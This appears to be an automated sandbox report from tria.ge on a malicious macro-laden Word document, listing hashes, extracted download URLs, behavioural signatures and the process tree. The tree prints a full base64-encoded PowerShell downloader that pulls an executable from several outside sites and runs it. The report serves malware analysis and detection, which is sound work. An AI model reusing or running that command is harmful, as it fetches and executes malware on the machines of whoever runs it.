Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13/09/2024, 02:19
Behavioral task
behavioral1
Sample
dd79383953ec578ab0e7795247795b5a_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
dd79383953ec578ab0e7795247795b5a_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
dd79383953ec578ab0e7795247795b5a_JaffaCakes118.doc
-
Size
251KB
-
MD5
dd79383953ec578ab0e7795247795b5a
-
SHA1
6416265f37e0af93823f7e96fb19e1593ed2d8da
-
SHA256
1bc4a47d0fe2369993ff6f11e93075f7e441de5d443e88719a9787c43f6a277a
-
SHA512
92f78d00f19df80779fc6151806987922eb1dbddd1134c59f225688aacf7e1988614fb027217c5f1caa7f20953e483717bbeeaae660114e310cfd77f6841899c
-
SSDEEP
3072:6Yy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////s:C0uXnWFchmmcI/o1/A2yFRq
Malware Config
Extracted
http://hoagietesting10.com/wp-content/SJ/
http://iscamenabe.com/wp-content/1PR/
http://vietmade.org/wp-admin/8/
http://www.filamchimovies.com/wp-admin/8/
https://strattonmobile.com/wp-content/yl/
https://blog.qgdxzs.com/wp-admin/I/
http://vietsex.pro/wp-content/PX/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2356 2060 powershell.exe 28 -
Blocklisted process makes network request 7 IoCs
flow pid Process 8 2356 powershell.exe 9 2356 powershell.exe 10 2356 powershell.exe 12 2356 powershell.exe 13 2356 powershell.exe 16 2356 powershell.exe 17 2356 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C287E015-251A-4204-8F27-D6B6EE848434}\2.0\0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\TypeLib\{C287E015-251A-4204-8F27-D6B6EE848434}\2.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C287E015-251A-4204-8F27-D6B6EE848434}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\TypeLib WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C287E015-251A-4204-8F27-D6B6EE848434}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C287E015-251A-4204-8F27-D6B6EE848434}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2868 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2356 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2356 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2868 WINWORD.EXE 2868 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2868 wrote to memory of 2560 2868 WINWORD.EXE 34 PID 2868 wrote to memory of 2560 2868 WINWORD.EXE 34 PID 2868 wrote to memory of 2560 2868 WINWORD.EXE 34 PID 2868 wrote to memory of 2560 2868 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dd79383953ec578ab0e7795247795b5a_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encod JABUADkAXwBvAGUAeQA2AD0AKAAoACcAQgAnACsAJwBsAGgAJwApACsAJwBnAHoAJwArACcANABvACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAVQBzAEUAcgBQAFIATwBmAEkATABFAFwAcQA3AGMAVgBtAGcANQBcAGgAdgA3ADQAeAA2AEwAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAFIAZQBDAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAFUAcgBgAEkAYABUAHkAUAByAE8AVABgAE8AQwBPAGwAIgAgAD0AIAAoACgAJwB0AGwAcwAxACcAKwAnADIALAAgAHQAbAAnACsAJwBzADEAJwArACcAMQAnACkAKwAnACwAJwArACcAIAB0ACcAKwAnAGwAJwArACcAcwAnACkAOwAkAEUAOAAyADgAbABlADAAIAA9ACAAKAAoACcARQAnACsAJwBoADUAdQAnACkAKwAnAHUAJwArACgAJwBpACcAKwAnAGoAagBrACcAKQApADsAJABMADEANAB5AGEAbAB3AD0AKAAnAEUAbwAnACsAJwBlAHUAJwArACgAJwBqAF8AJwArACcAYgAnACkAKQA7ACQATABkAGwAMQBrAHoAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnADkATQAnACsAJwBIAFEANwBjAHYAbQBnACcAKwAnADUAJwApACsAJwA5ACcAKwAnAE0ASAAnACsAJwBIAHYAJwArACcANwAnACsAKAAnADQAeAA2AGwAJwArACcAOQBNAEgAJwApACkALQByAEUAUABMAEEAQwBFACAAIAAoACcAOQBNACcAKwAnAEgAJwApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEUAOAAyADgAbABlADAAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAE4AYgBfAHgAdAByAGgAPQAoACgAJwBRAHEAJwArACcAYgAnACkAKwAoACcAMwB5AHMAJwArACcAeQAnACkAKQA7ACQAVgB1AHQAcAByAHEAbgA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAHQALgB3AEUAQgBDAGwAaQBFAE4AVAA7ACQATwBzADAAbgBjAHEAMQA9ACgAJwBoACcAKwAnAHQAdAAnACsAKAAnAHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAGgAbwAnACkAKwAnAGEAZwAnACsAKAAnAGkAZQAnACsAJwB0ACcAKwAnAGUAcwB0AGkAJwApACsAJwBuAGcAJwArACcAMQAnACsAKAAnADAALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQBjACcAKwAnAG8AbgB0AGUAJwArACcAbgB0AC8AUwBKACcAKwAnAC8AKgBoAHQAdABwADoALwAnACsAJwAvACcAKwAnAGkAJwArACcAcwBjAGEAJwArACcAbQBlACcAKwAnAG4AYQAnACkAKwAoACcAYgAnACsAJwBlAC4AJwArACcAYwBvAG0AJwArACcALwAnACsAJwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMQAnACsAJwBQACcAKwAnAFIALwAqACcAKQArACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAOgAnACsAKAAnAC8ALwAnACsAJwB2AGkAZQB0AG0AJwApACsAJwBhAGQAJwArACcAZQAuACcAKwAnAG8AJwArACcAcgAnACsAKAAnAGcAJwArACcALwB3ACcAKQArACcAcAAtACcAKwAoACcAYQBkAG0AaQAnACsAJwBuAC8AJwArACcAOAAnACkAKwAnAC8AJwArACcAKgAnACsAKAAnAGgAdAB0AHAAJwArACcAOgAvAC8AJwApACsAKAAnAHcAJwArACcAdwB3ACcAKQArACcALgAnACsAKAAnAGYAaQAnACsAJwBsAGEAJwArACcAbQBjACcAKQArACcAaAAnACsAKAAnAGkAbQAnACsAJwBvACcAKQArACgAJwB2AGkAZQBzACcAKwAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQBhACcAKwAnAGQAbQBpAG4AJwApACsAKAAnAC8AOAAnACsAJwAvACoAJwArACcAaAB0AHQAcABzADoAJwApACsAKAAnAC8ALwBzACcAKwAnAHQAJwApACsAKAAnAHIAYQAnACsAJwB0AHQAJwApACsAJwBvACcAKwAnAG4AbQAnACsAJwBvACcAKwAnAGIAJwArACcAaQBsACcAKwAoACcAZQAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAvACcAKwAnAHcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAoACcAdAAnACsAJwBlAG4AJwApACsAJwB0ACcAKwAnAC8AeQAnACsAKAAnAGwAJwArACcALwAqACcAKwAnAGgAdAB0AHAAcwAnACkAKwAoACcAOgAvAC8AYgAnACsAJwBsACcAKQArACcAbwBnACcAKwAnAC4AcQAnACsAKAAnAGcAZAB4AHoAJwArACcAcwAnACsAJwAuAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtAGEAJwApACsAKAAnAGQAbQBpAG4ALwBJACcAKwAnAC8AKgBoACcAKwAnAHQAJwApACsAKAAnAHQAcAA6ACcAKwAnAC8ALwB2AGkAJwArACcAZQB0AHMAJwApACsAKAAnAGUAeAAnACsAJwAuACcAKQArACcAcAAnACsAJwByACcAKwAoACcAbwAnACsAJwAvAHcAJwApACsAKAAnAHAAJwArACcALQBjAG8AbgAnACkAKwAnAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAFAAWAAnACsAJwAvACcAKQApAC4AIgBzAHAAYABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEMAYgBpAGYAYwBvAGsAPQAoACcATwBnACcAKwAoACcAeABhACcAKwAnADUAdwAnACkAKwAnADkAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAQgBlAHYAcQBxAHcANQAgAGkAbgAgACQATwBzADAAbgBjAHEAMQApAHsAdAByAHkAewAkAFYAdQB0AHAAcgBxAG4ALgAiAGQATwBgAHcAYABOAGwATwBBAGQARgBpAEwARQAiACgAJABCAGUAdgBxAHEAdwA1ACwAIAAkAEwAZABsADEAawB6AHEAKQA7ACQATgBuADEAaQBrAHgAdgA9ACgAJwBOACcAKwAoACcANgAnACsAJwBhAHYAawAnACsAJwA1ADYAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQATABkAGwAMQBrAHoAcQApAC4AIgBMAGUATgBnAGAAVABoACIAIAAtAGcAZQAgADMAMwAyADAAOAApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACgAJABMAGQAbAAxAGsAegBxACkAOwAkAEsAcgBpADMANwBlAGUAPQAoACcAQwAnACsAKAAnAGMAJwArACcAbQA1AGgAZQAnACsAJwBiACcAKQApADsAYgByAGUAYQBrADsAJABGAGoAbAAzAHEAcQByAD0AKAAoACcASAB4ACcAKwAnAGgAbgAnACkAKwAnADEAJwArACcAdgAyACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBrAHEAZQAxAGMAeAA9ACgAKAAnAFAAcgAnACsAJwBmAHUAagBlACcAKQArACcAbAAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5387b15becc4e077e2cacfca6af950f72
SHA19515cc45ee2ab2caa1b9f9edd47e6c2df6344a62
SHA25654b044423787d31d7940b68f1eba585c9338ee2979c65627554ba14a146ee31c
SHA5123aa61db83ef331fe19ddeaf39c4e70cd436cc4a594cd111959524566fe884cb3d1d7edac817260e576f049625a740f247bdd3cc90a028f6f649e5ff14b73411e